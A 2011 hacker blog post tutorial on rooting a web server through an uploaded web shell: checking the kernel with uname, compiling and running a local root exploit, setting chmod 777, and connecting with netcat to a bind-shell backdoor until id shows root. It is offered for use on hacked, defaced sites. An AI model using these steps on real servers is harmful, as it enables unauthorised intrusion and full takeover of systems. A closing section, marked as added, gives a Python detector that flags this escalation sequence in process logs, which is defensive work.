BLACK BURN HACKER


Saturday, December 10, 2011

r00ting Tutorial bY BLACK BURN

Rooting Tutorial

Okay, I have some free time, so I can spend it the right way. First see the video. All of us know how to hack websites, upload a shell to them and deface them. So do you really think this is everything you can do with that small piece of code? Nah, there are lots of other things you cannot imagine doing with that shell. One of those things is the rooting process, also known as the privilege gaining process, and it goes by lots of other names. For this work I prefer the GNY Shell, which is the most useful shell and has lots of tools in it. So let's start.
What do we need?
-Shell attached to a website
-Backconnection script
-Exploit
-And a bit of knowledge about Unix systems

So let's start the journey to the 0day.

The first thing we need to check is the kernel version. We do that by executing this command in the command field or the console in the shell:
Code:
uname -a
and it will return the version of the kernel, in this case:
Code:
Linux  2.6.18-194.11.1.el5PAE #1 SMP Tue Aug 10 19:48:16 EDT 2009 i686 i686 i386 GNU/Linux
So now we search for an exploit for that kernel, also known as a local root exploit. But let's make clear what an "EXPLOIT" is.
-Exploit
That is code that gives us the privilege to gain root and have access to the whole server. Now imagine a house: you are the attacker who wants to get into the house, the lock is old (in this case that is the kernel) and we have a key [EXPLOIT] that is going to open that door and let us into the house [SERVER]. So is this clear? What is an exploit? Good, we move on...

After we search for an exploit and find the right one, we upload it to the server.
Now if the exploit is not compiled, we do that by executing the following command:
Code:
gcc filename.c -o filename
This will compile the code and we are set to go, but not quite. Why? Well, we also need to set 777 permissions on the exploit. To do that we execute the following command:
Code:
chmod 777 filename
Now we are ready to do a backconnect and execute the exploit.
As I said, we are going to use GNY Shell: go to the Backdoor section and set your PORT number.
I set it to something like 7777 or 7887, but that is your wish and choice.
After we set the backdoor, we go to
Code:
RUN->CMD
and now we go to the directory where our NetCat is, in my case
Code:
C:\nc
and now we write the next command in our CMD (if you're on Linux you write the same command)
Code:
nc <IP of the server> <PORT>
In this case its:
Code:
nc 127.0.0.1 7777
And the following line pops up when I write that:
Code:
    :: w4ck1ng-shell (Private Build v0.3) bind shell backdoor ::
Now we execute id to check who we are:
Code:
id
and get:
Code:
id=99(nobody) gid=99(nobody)
So we are nobody, hmmm, not for long. Now we execute the exploit that we compiled and set to 777:
Code:
./exploitname or ./filename
and after it finishes we check again whether we are still nobody:
Code:
id
and we get:
Code:
id=root gid=root groups=root
w00t!!!!! We are now root, the most powerful user in the UNIX system l0l
Now we can go wherever we want and do whatever we have on our mind.

I hope you enjoy it! If you have any questions, write them down and feel free to comment.
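
Seen from the defender's side, the steps above leave a recognisable trail in process-execution logs: the web server account queries the kernel version, compiles code, sets mode 777, and then spawns a child running as root. The following is an added example, not part of the original post, that flags that sequence; the key=value log format, the sample events and the assumption that the web server runs as uid 99 (nobody) are constructed for illustration.

```python
import shlex

# Constructed sample: simplified process-exec events (hypothetical key=value
# format, not real auditd output) mirroring the sequence in the tutorial.
SAMPLE_EVENTS = """\
ts=1 pid=4100 ppid=900 uid=99 exe=/bin/uname args="uname -a"
ts=2 pid=4101 ppid=900 uid=99 exe=/usr/bin/gcc args="gcc filename.c -o filename"
ts=3 pid=4102 ppid=900 uid=99 exe=/bin/chmod args="chmod 777 filename"
ts=4 pid=4103 ppid=900 uid=99 exe=/tmp/filename args="./filename"
ts=5 pid=4104 ppid=4103 uid=0 exe=/usr/bin/id args="id"
ts=6 pid=5000 ppid=1 uid=0 exe=/usr/sbin/crond args="crond"
"""

SERVICE_UIDS = {99}              # assumption: web server runs as nobody (uid 99)
COMPILERS = {"gcc", "cc", "make"}

def parse(line):
    """Turn one key=value event line into a dict with integer ids."""
    ev = dict(tok.split("=", 1) for tok in shlex.split(line))
    for key in ("ts", "pid", "ppid", "uid"):
        ev[key] = int(ev[key])
    return ev

def detect(text):
    """Return (ts, rule) alerts for web-shell style privilege escalation."""
    alerts, uid_of = [], {}
    for ev in map(parse, text.strip().splitlines()):
        uid_of[ev["pid"]] = ev["uid"]          # remember each process's uid
        name = ev["exe"].rsplit("/", 1)[-1]
        argv = ev["args"].split()
        if ev["uid"] in SERVICE_UIDS:
            if name == "uname":
                alerts.append((ev["ts"], "recon_uname"))
            if name in COMPILERS:
                alerts.append((ev["ts"], "compile_on_host"))
            if name == "chmod" and "777" in argv:
                alerts.append((ev["ts"], "chmod_777"))
        # Strongest signal: a root process whose parent ran as the service account.
        if ev["uid"] == 0 and uid_of.get(ev["ppid"]) in SERVICE_UIDS:
            alerts.append((ev["ts"], "uid_transition_to_root"))
    return alerts

if __name__ == "__main__":
    for ts, rule in detect(SAMPLE_EVENTS):
        print(ts, rule)
```

The first three rules are weak signals on their own and need tuning per host; the uid transition from the service account to root is the one to alert on directly.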
